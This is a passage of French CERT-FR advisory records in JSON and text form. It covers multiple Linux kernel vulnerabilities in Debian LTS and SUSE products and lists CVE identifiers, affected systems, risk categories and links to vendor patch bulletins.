"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-38556",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38556"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2025-71150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71150"
},
{
"name": "CVE-2025-39721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39721"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-38718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38718"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2025-68799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68799"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-23087",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23087"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-52658",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52658"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2026-23075",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23075"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2025-68781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68781"
},
{
"name": "CVE-2025-68369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68369"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2025-22022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22022"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2025-71105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71105"
},
{
"name": "CVE-2025-68266",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68266"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2026-22984",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22984"
},
{
"name": "CVE-2025-68757",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68757"
},
{
"name": "CVE-2026-23033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23033"
},
{
"name": "CVE-2026-22977",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22977"
},
{
"name": "CVE-2026-23003",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23003"
},
{
"name": "CVE-2025-68766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68766"
},
{
"name": "CVE-2026-23076",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23076"
},
{
"name": "CVE-2025-71123",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71123"
},
{
"name": "CVE-2025-68372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68372"
},
{
"name": "CVE-2026-23010",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23010"
},
{
"name": "CVE-2025-71137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71137"
},
{
"name": "CVE-2026-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23084"
},
{
"name": "CVE-2026-22979",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22979"
},
{
"name": "CVE-2026-23011",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23011"
},
{
"name": "CVE-2026-23110",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23110"
},
{
"name": "CVE-2025-71120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71120"
},
{
"name": "CVE-2026-23060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23060"
},
{
"name": "CVE-2025-68282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68282"
},
{
"name": "CVE-2025-68817",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68817"
},
{
"name": "CVE-2025-71119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71119"
},
{
"name": "CVE-2025-68787",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68787"
},
{
"name": "CVE-2025-68782",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68782"
},
{
"name": "CVE-2025-71197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71197"
},
{
"name": "CVE-2025-68758",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68758"
},
{
"name": "CVE-2026-23031",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23031"
},
{
"name": "CVE-2025-71113",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71113"
},
{
"name": "CVE-2025-71127",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71127"
},
{
"name": "CVE-2026-23102",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23102"
},
{
"name": "CVE-2026-22998",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22998"
},
{
"name": "CVE-2025-68340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68340"
},
{
"name": "CVE-2025-40110",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40110"
},
{
"name": "CVE-2025-68798",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68798"
},
{
"name": "CVE-2025-68336",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68336"
},
{
"name": "CVE-2023-52975",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52975"
},
{
"name": "CVE-2026-23097",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23097"
},
{
"name": "CVE-2025-68819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68819"
},
{
"name": "CVE-2026-23021",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23021"
},
{
"name": "CVE-2025-68732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68732"
},
{
"name": "CVE-2026-23093",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23093"
},
{
"name": "CVE-2025-71183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71183"
},
{
"name": "CVE-2025-68371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68371"
},
{
"name": "CVE-2025-68211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68211"
},
{
"name": "CVE-2025-71091",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71091"
},
{
"name": "CVE-2025-68263",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68263"
},
{
"name": "CVE-2025-68800",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68800"
},
{
"name": "CVE-2025-68261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68261"
},
{
"name": "CVE-2022-48744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48744"
},
{
"name": "CVE-2025-71149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71149"
},
{
"name": "CVE-2025-68767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68767"
},
{
"name": "CVE-2025-68727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68727"
},
{
"name": "CVE-2026-23080",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23080"
},
{
"name": "CVE-2025-38361",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38361"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-13T00:00:00",
"last_revision_date": "2026-02-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0167",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de Debian LTS. Elles permettent \u00e0 un attaquant de provoquer une \u00e9l\u00e9vation de privil\u00e8ges, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un d\u00e9ni de service.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de Debian LTS",
"vendor_advisories": [
{
"published_at": "2026-02-10",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-4476-1",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00017.html"
},
{
"published_at": "2026-02-10",
"title": "Bulletin de s\u00e9curit\u00e9 Debian LTS DLA-4475-1",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00016.html"
}
]
}
CERTFR-2026-AVI-0170
Vulnerability from certfr_avis - Published: 2026-02-13 - Updated: 2026-02-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de SUSE. Certaines d'entre elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une atteinte à l'intégrité des données et un contournement de la politique de sécurité.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SUSE | N/A | SUSE Linux Enterprise Micro for Rancher 5.3 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 15 SP5 | ||
| SUSE | N/A | Public Cloud Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.3 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro for Rancher 5.2 | ||
| SUSE | N/A | SUSE Linux Enterprise Workstation Extension 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing 12 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 12 SP5 | ||
| SUSE | N/A | Legacy Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro for Rancher 5.4 | ||
| SUSE | N/A | SUSE Linux Enterprise High Availability Extension 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 12 SP5 LTSS | ||
| SUSE | N/A | SUSE Linux Enterprise Desktop 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP7 | ||
| SUSE | N/A | openSUSE Leap 15.5 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 12-SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Live Patching 15-SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing LTSS 15 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP6 LTSS | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.2 | ||
| SUSE | N/A | SUSE Linux Enterprise Real Time 15 SP6 | ||
| SUSE | N/A | openSUSE Leap 15.6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP5 LTSS | ||
| SUSE | N/A | SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5 | ||
| SUSE | N/A | Development Tools Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 12 SP5 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.4 | ||
| SUSE | N/A | openSUSE Leap 15.3 | ||
| SUSE | N/A | Basesystem Module 15-SP7 | ||
| SUSE | N/A | SUSE Linux Enterprise High Availability Extension 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server for SAP Applications 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security | ||
| SUSE | N/A | SUSE Linux Enterprise Server 15 SP6 | ||
| SUSE | N/A | SUSE Linux Enterprise Micro 5.5 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Public Cloud Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Workstation Extension 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Legacy Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro for Rancher 5.4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Desktop 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 12-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Live Patching 15-SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing LTSS 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6 LTSS",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.2",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Real Time 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP5 LTSS",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Performance Computing ESPOS 15 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Development Tools Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 12 SP5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "openSUSE Leap 15.3",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "Basesystem Module 15-SP7",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise High Availability Extension 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server for SAP Applications 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 12 SP5 LTSS Extended Security",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Server 15 SP6",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
},
{
"description": "SUSE Linux Enterprise Micro 5.5",
"product": {
"name": "N/A",
"vendor": {
"name": "SUSE",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-50669",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50669"
},
{
"name": "CVE-2024-36903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36903"
},
{
"name": "CVE-2023-53761",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53761"
},
{
"name": "CVE-2023-53814",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53814"
},
{
"name": "CVE-2025-40166",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40166"
},
{
"name": "CVE-2023-53407",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53407"
},
{
"name": "CVE-2023-54076",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54076"
},
{
"name": "CVE-2023-54208",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54208"
},
{
"name": "CVE-2023-53714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53714"
},
{
"name": "CVE-2023-54039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54039"
},
{
"name": "CVE-2023-53804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53804"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2023-53863",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53863"
},
{
"name": "CVE-2023-54131",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54131"
},
{
"name": "CVE-2023-54142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54142"
},
{
"name": "CVE-2022-50779",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50779"
},
{
"name": "CVE-2023-54111",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54111"
},
{
"name": "CVE-2023-54186",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54186"
},
{
"name": "CVE-2025-68286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68286"
},
{
"name": "CVE-2023-53803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53803"
},
{
"name": "CVE-2022-50641",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50641"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2023-53754",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53754"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2023-54091",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54091"
},
{
"name": "CVE-2023-54083",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54083"
},
{
"name": "CVE-2023-54280",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54280"
},
{
"name": "CVE-2022-50834",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50834"
},
{
"name": "CVE-2022-50809",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50809"
},
{
"name": "CVE-2023-54270",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54270"
},
{
"name": "CVE-2023-53685",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53685"
},
{
"name": "CVE-2022-50488",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50488"
},
{
"name": "CVE-2025-37751",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37751"
},
{
"name": "CVE-2025-40254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40254"
},
{
"name": "CVE-2023-54021",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54021"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2023-54201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54201"
},
{
"name": "CVE-2025-68200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68200"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2023-54265",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54265"
},
{
"name": "CVE-2022-50630",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50630"
},
{
"name": "CVE-2022-50672",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50672"
},
{
"name": "CVE-2023-54309",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54309"
},
{
"name": "CVE-2022-50776",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50776"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2023-54018",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54018"
},
{
"name": "CVE-2023-54271",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54271"
},
{
"name": "CVE-2022-50702",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50702"
},
{
"name": "CVE-2023-53786",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53786"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2022-50761",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50761"
},
{
"name": "CVE-2022-50866",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50866"
},
{
"name": "CVE-2025-40019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40019"
},
{
"name": "CVE-2023-54112",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54112"
},
{
"name": "CVE-2025-71135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71135"
},
{
"name": "CVE-2022-50676",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50676"
},
{
"name": "CVE-2023-53845",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53845"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2022-50622",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50622"
},
{
"name": "CVE-2023-54095",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54095"
},
{
"name": "CVE-2025-68297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68297"
},
{
"name": "CVE-2022-50646",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50646"
},
{
"name": "CVE-2022-50853",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50853"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-40139",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40139"
},
{
"name": "CVE-2023-54100",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54100"
},
{
"name": "CVE-2025-40350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40350"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2025-38243",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38243"
},
{
"name": "CVE-2023-54001",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54001"
},
{
"name": "CVE-2025-38563",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38563"
},
{
"name": "CVE-2022-50619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50619"
},
{
"name": "CVE-2025-21658",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21658"
},
{
"name": "CVE-2025-38375",
